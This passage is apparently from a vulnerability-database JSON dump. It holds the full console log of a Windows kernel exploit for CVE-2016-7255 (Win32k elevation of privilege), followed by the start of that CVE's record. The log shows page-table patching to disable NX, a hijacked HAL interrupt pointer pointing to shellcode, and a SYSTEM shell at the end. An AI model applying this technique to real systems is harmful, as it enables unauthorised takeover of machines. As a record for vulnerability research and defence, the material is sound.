Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n\r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............\r\n000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....\r\n000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....\r\n000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......\r\n000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............\r\n000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....\r\n000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............\r\n000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......\r\n000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............\r\n000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......\r\n000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......\r\n\r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\qa\\Desktop>\r\n", "osvdbidlist": []}

{"cve": [{"lastseen": "2021-02-02T06:28:11", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T07:00:00", "title": "CVE-2016-7255", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": 